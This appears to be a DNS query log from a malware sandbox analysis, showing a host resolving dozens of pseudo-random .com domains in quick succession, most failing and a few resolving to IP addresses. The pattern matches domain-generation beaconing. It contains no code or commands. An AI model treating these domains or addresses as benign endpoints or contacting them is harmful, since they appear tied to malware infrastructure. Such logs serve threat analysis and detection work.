Aug 23, 2024 18:42:57.405297995 CEST	1.1.1.1	192.168.2.5	0x5c69	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.405297995 CEST	1.1.1.1	192.168.2.5	0x5c69	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.406311035 CEST	1.1.1.1	192.168.2.5	0xa38a	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.407485962 CEST	1.1.1.1	192.168.2.5	0x5468	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.407515049 CEST	1.1.1.1	192.168.2.5	0x9e92	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.407548904 CEST	1.1.1.1	192.168.2.5	0x1d10	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.409020901 CEST	1.1.1.1	192.168.2.5	0x3a54	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.409198046 CEST	1.1.1.1	192.168.2.5	0x8653	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.409853935 CEST	1.1.1.1	192.168.2.5	0xe00	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.410005093 CEST	1.1.1.1	192.168.2.5	0x1568	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.411696911 CEST	1.1.1.1	192.168.2.5	0x254e	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.413846970 CEST	1.1.1.1	192.168.2.5	0xdf7c	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.414868116 CEST	1.1.1.1	192.168.2.5	0xa6e6	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.415116072 CEST	1.1.1.1	192.168.2.5	0x2b28	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.425185919 CEST	1.1.1.1	192.168.2.5	0x34f8	No error (0)	lyvyxor.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.428054094 CEST	1.1.1.1	192.168.2.5	0xfdcf	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.429016113 CEST	1.1.1.1	192.168.2.5	0xc132	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.433739901 CEST	1.1.1.1	192.168.2.5	0x7757	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.434150934 CEST	1.1.1.1	192.168.2.5	0x1c78	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.435077906 CEST	1.1.1.1	192.168.2.5	0xf774	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.462013006 CEST	1.1.1.1	192.168.2.5	0xc21c	No error (0)	vocyzit.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.464169979 CEST	1.1.1.1	192.168.2.5	0x5bd1	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.473212957 CEST	1.1.1.1	192.168.2.5	0x6fc5	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.473212957 CEST	1.1.1.1	192.168.2.5	0x6fc5	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.474153042 CEST	1.1.1.1	192.168.2.5	0xb27d	No error (0)	vonypom.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.547645092 CEST	1.1.1.1	192.168.2.5	0x7267	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.557955980 CEST	1.1.1.1	192.168.2.5	0xc9ab	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.986367941 CEST	1.1.1.1	192.168.2.5	0x6cb8	No error (0)	gatyfus.com		5.79.71.225	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.986367941 CEST	1.1.1.1	192.168.2.5	0x6cb8	No error (0)	gatyfus.com		85.17.31.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.986367941 CEST	1.1.1.1	192.168.2.5	0x6cb8	No error (0)	gatyfus.com		85.17.31.122	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.986367941 CEST	1.1.1.1	192.168.2.5	0x6cb8	No error (0)	gatyfus.com		178.162.203.202	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.986367941 CEST	1.1.1.1	192.168.2.5	0x6cb8	No error (0)	gatyfus.com		178.162.203.211	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.986367941 CEST	1.1.1.1	192.168.2.5	0x6cb8	No error (0)	gatyfus.com		178.162.203.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.986367941 CEST	1.1.1.1	192.168.2.5	0x6cb8	No error (0)	gatyfus.com		178.162.217.107	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.986367941 CEST	1.1.1.1	192.168.2.5	0x6cb8	No error (0)	gatyfus.com		5.79.71.205	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:58.958283901 CEST	1.1.1.1	192.168.2.5	0x8c6b	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:58.958693981 CEST	1.1.1.1	192.168.2.5	0x8c6b	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:59.365026951 CEST	1.1.1.1	192.168.2.5	0x21ad	No error (0)	vojyqem.com		172.234.222.143	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:59.365026951 CEST	1.1.1.1	192.168.2.5	0x21ad	No error (0)	vojyqem.com		172.234.222.138	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:59.365072966 CEST	1.1.1.1	192.168.2.5	0x21ad	No error (0)	vojyqem.com		172.234.222.143	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:59.365072966 CEST	1.1.1.1	192.168.2.5	0x21ad	No error (0)	vojyqem.com		172.234.222.138	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:59.685769081 CEST	1.1.1.1	192.168.2.5	0x8c6b	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.295478106 CEST	1.1.1.1	192.168.2.5	0xa20d	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.295907021 CEST	1.1.1.1	192.168.2.5	0xaa38	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.296076059 CEST	1.1.1.1	192.168.2.5	0xf26c	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.296787024 CEST	1.1.1.1	192.168.2.5	0x3b50	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.299228907 CEST	1.1.1.1	192.168.2.5	0x1050	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.299571991 CEST	1.1.1.1	192.168.2.5	0x41aa	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.299571991 CEST	1.1.1.1	192.168.2.5	0x41aa	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.300117016 CEST	1.1.1.1	192.168.2.5	0x17cb	No error (0)	gatyfus.com		178.162.203.202	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.300117016 CEST	1.1.1.1	192.168.2.5	0x17cb	No error (0)	gatyfus.com		178.162.203.211	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.300117016 CEST	1.1.1.1	192.168.2.5	0x17cb	No error (0)	gatyfus.com		178.162.203.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.300117016 CEST	1.1.1.1	192.168.2.5	0x17cb	No error (0)	gatyfus.com		178.162.217.107	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.300117016 CEST	1.1.1.1	192.168.2.5	0x17cb	No error (0)	gatyfus.com		5.79.71.205	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.300117016 CEST	1.1.1.1	192.168.2.5	0x17cb	No error (0)	gatyfus.com		5.79.71.225	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.300117016 CEST	1.1.1.1	192.168.2.5	0x17cb	No error (0)	gatyfus.com		85.17.31.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.300117016 CEST	1.1.1.1	192.168.2.5	0x17cb	No error (0)	gatyfus.com		85.17.31.122	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.301704884 CEST	1.1.1.1	192.168.2.5	0x739	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.316915035 CEST	1.1.1.1	192.168.2.5	0xb4f6	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.322272062 CEST	1.1.1.1	192.168.2.5	0xd75	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.382947922 CEST	1.1.1.1	192.168.2.5	0x8f5b	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.383416891 CEST	1.1.1.1	192.168.2.5	0x1448	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.385001898 CEST	1.1.1.1	192.168.2.5	0xa0fc	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.385313988 CEST	1.1.1.1	192.168.2.5	0xac94	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.385572910 CEST	1.1.1.1	192.168.2.5	0x9791	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.386368036 CEST	1.1.1.1	192.168.2.5	0x2e97	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.387460947 CEST	1.1.1.1	192.168.2.5	0xca0c	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.390285969 CEST	1.1.1.1	192.168.2.5	0x2452	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.390741110 CEST	1.1.1.1	192.168.2.5	0xf7e3	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.392309904 CEST	1.1.1.1	192.168.2.5	0xe552	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.393532991 CEST	1.1.1.1	192.168.2.5	0xe6f4	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.393542051 CEST	1.1.1.1	192.168.2.5	0x8237	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.393546104 CEST	1.1.1.1	192.168.2.5	0x4355	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.393815041 CEST	1.1.1.1	192.168.2.5	0x9107	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.394742012 CEST	1.1.1.1	192.168.2.5	0xda49	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.395313978 CEST	1.1.1.1	192.168.2.5	0xa980	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.395687103 CEST	1.1.1.1	192.168.2.5	0x97f2	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.396065950 CEST	1.1.1.1	192.168.2.5	0x2d06	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.397387028 CEST	1.1.1.1	192.168.2.5	0xdd28	Name error (3)	lygygin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.397917986 CEST	1.1.1.1	192.168.2.5	0xca91	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.398564100 CEST	1.1.1.1	192.168.2.5	0xcccc	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.398739100 CEST	1.1.1.1	192.168.2.5	0xde59	Name error (3)	vofygum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.400346041 CEST	1.1.1.1	192.168.2.5	0x794e	Name error (3)	puzywel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.402647018 CEST	1.1.1.1	192.168.2.5	0x13cc	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.404295921 CEST	1.1.1.1	192.168.2.5	0xb1b8	Name error (3)	gadyfuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.404511929 CEST	1.1.1.1	192.168.2.5	0x5a08	Name error (3)	volyqat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.406889915 CEST	1.1.1.1	192.168.2.5	0xed5a	Name error (3)	qedyfyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.408399105 CEST	1.1.1.1	192.168.2.5	0x84fc	Name error (3)	vonyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.409002066 CEST	1.1.1.1	192.168.2.5	0x506e	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.409012079 CEST	1.1.1.1	192.168.2.5	0x92d1	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.409012079 CEST	1.1.1.1	192.168.2.5	0x92d1	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.409019947 CEST	1.1.1.1	192.168.2.5	0xc846	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.409091949 CEST	1.1.1.1	192.168.2.5	0xec98	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.409729958 CEST	1.1.1.1	192.168.2.5	0xeaa8	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.411637068 CEST	1.1.1.1	192.168.2.5	0xf7a9	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.414917946 CEST	1.1.1.1	192.168.2.5	0x4005	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.416955948 CEST	1.1.1.1	192.168.2.5	0xee14	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.417432070 CEST	1.1.1.1	192.168.2.5	0xead4	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.419847012 CEST	1.1.1.1	192.168.2.5	0xaf16	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.424069881 CEST	1.1.1.1	192.168.2.5	0x8c0f	Name error (3)	gaqycos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.424078941 CEST	1.1.1.1	192.168.2.5	0x6e6c	Name error (3)	qeqyxov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.426423073 CEST	1.1.1.1	192.168.2.5	0x52b	Name error (3)	pumyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.426470041 CEST	1.1.1.1	192.168.2.5	0xf72c	Name error (3)	qekyqop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.460913897 CEST	1.1.1.1	192.168.2.5	0xb19c	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.461467981 CEST	1.1.1.1	192.168.2.5	0x33e9	No error (0)	qetyfuv.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.462124109 CEST	1.1.1.1	192.168.2.5	0xaea	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.463860989 CEST	1.1.1.1	192.168.2.5	0x176d	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.463860989 CEST	1.1.1.1	192.168.2.5	0x176d	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.464804888 CEST	1.1.1.1	192.168.2.5	0xd6fa	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.467155933 CEST	1.1.1.1	192.168.2.5	0xbb85	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.467350960 CEST	1.1.1.1	192.168.2.5	0xfdd4	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.471064091 CEST	1.1.1.1	192.168.2.5	0x87d6	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.471117973 CEST	1.1.1.1	192.168.2.5	0x7702	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.471427917 CEST	1.1.1.1	192.168.2.5	0xe7ce	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.471801996 CEST	1.1.1.1	192.168.2.5	0xfc4f	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.472067118 CEST	1.1.1.1	192.168.2.5	0x2ed8	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.475158930 CEST	1.1.1.1	192.168.2.5	0xfd5b	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.475158930 CEST	1.1.1.1	192.168.2.5	0xfd5b	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.481389046 CEST	1.1.1.1	192.168.2.5	0xa210	No error (0)	vonypom.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.484394073 CEST	1.1.1.1	192.168.2.5	0xcaef	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.485917091 CEST	1.1.1.1	192.168.2.5	0x10e6	No error (0)	vocyzit.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.486471891 CEST	1.1.1.1	192.168.2.5	0xadde	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.486587048 CEST	1.1.1.1	192.168.2.5	0xfc54	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.488373041 CEST	1.1.1.1	192.168.2.5	0x2c2d	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.490550041 CEST	1.1.1.1	192.168.2.5	0x1d09	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.490866899 CEST	1.1.1.1	192.168.2.5	0xe2eb	No error (0)	lymyxid.com		3.94.10.34	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.492760897 CEST	1.1.1.1	192.168.2.5	0xdd9e	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.498272896 CEST	1.1.1.1	192.168.2.5	0x40d3	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.500000954 CEST	1.1.1.1	192.168.2.5	0x2c58	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.500889063 CEST	1.1.1.1	192.168.2.5	0x98fe	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.505192995 CEST	1.1.1.1	192.168.2.5	0xb0d9	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.510812044 CEST	1.1.1.1	192.168.2.5	0xa62d	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.511420012 CEST	1.1.1.1	192.168.2.5	0xa75	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.523866892 CEST	1.1.1.1	192.168.2.5	0xc627	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.529243946 CEST	1.1.1.1	192.168.2.5	0xedce	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.534100056 CEST	1.1.1.1	192.168.2.5	0x732c	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.536415100 CEST	1.1.1.1	192.168.2.5	0xab37	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.537827969 CEST	1.1.1.1	192.168.2.5	0x7a54	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.555922031 CEST	1.1.1.1	192.168.2.5	0xf218	Name error (3)	vowycac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.560604095 CEST	1.1.1.1	192.168.2.5	0x6939	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.563097954 CEST	1.1.1.1	192.168.2.5	0x26f1	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.563698053 CEST	1.1.1.1	192.168.2.5	0xc26b	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.563707113 CEST	1.1.1.1	192.168.2.5	0x4246	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.565001965 CEST	1.1.1.1	192.168.2.5	0x4441	Name error (3)	vofygum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.565756083 CEST	1.1.1.1	192.168.2.5	0xe1ed	No error (0)	galyqaz.com		199.191.50.83	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.565766096 CEST	1.1.1.1	192.168.2.5	0x4fef	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.565845966 CEST	1.1.1.1	192.168.2.5	0xff74	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.566229105 CEST	1.1.1.1	192.168.2.5	0xe249	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.566971064 CEST	1.1.1.1	192.168.2.5	0x8a64	Name error (3)	lygygin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.567027092 CEST	1.1.1.1	192.168.2.5	0x5753	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.567138910 CEST	1.1.1.1	192.168.2.5	0xf5ef	Name error (3)	qeqyxov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.571341991 CEST	1.1.1.1	192.168.2.5	0xfbd2	No error (0)	qetyfuv.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.574631929 CEST	1.1.1.1	192.168.2.5	0xb4e5	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.574713945 CEST	1.1.1.1	192.168.2.5	0x3ef2	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.577420950 CEST	1.1.1.1	192.168.2.5	0x283d	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.577476978 CEST	1.1.1.1	192.168.2.5	0x8ce4	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.577949047 CEST	1.1.1.1	192.168.2.5	0xbb0	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.579564095 CEST	1.1.1.1	192.168.2.5	0x6c0	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.580682993 CEST	1.1.1.1	192.168.2.5	0x6c76	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.584743977 CEST	1.1.1.1	192.168.2.5	0xe58b	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.585311890 CEST	1.1.1.1	192.168.2.5	0x88b	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.586708069 CEST	1.1.1.1	192.168.2.5	0x23d5	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.586860895 CEST	1.1.1.1	192.168.2.5	0xed54	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.587657928 CEST	1.1.1.1	192.168.2.5	0x2cad	Name error (3)	gaqycos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.589397907 CEST	1.1.1.1	192.168.2.5	0x3b2e	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.590390921 CEST	1.1.1.1	192.168.2.5	0x3496	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.594861984 CEST	1.1.1.1	192.168.2.5	0xeae9	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.596266031 CEST	1.1.1.1	192.168.2.5	0x356b	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.596601963 CEST	1.1.1.1	192.168.2.5	0x2d31	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.596617937 CEST	1.1.1.1	192.168.2.5	0x4f1	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.597212076 CEST	1.1.1.1	192.168.2.5	0x28dc	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.597388983 CEST	1.1.1.1	192.168.2.5	0xf17f	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.599239111 CEST	1.1.1.1	192.168.2.5	0x96ef	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.599487066 CEST	1.1.1.1	192.168.2.5	0x1efe	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.599931002 CEST	1.1.1.1	192.168.2.5	0xe041	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.600575924 CEST	1.1.1.1	192.168.2.5	0xbee1	No error (0)	lyvyxor.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.603743076 CEST	1.1.1.1	192.168.2.5	0xebb9	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.605731964 CEST	1.1.1.1	192.168.2.5	0xf2b2	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.606794119 CEST	1.1.1.1	192.168.2.5	0x62ca	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
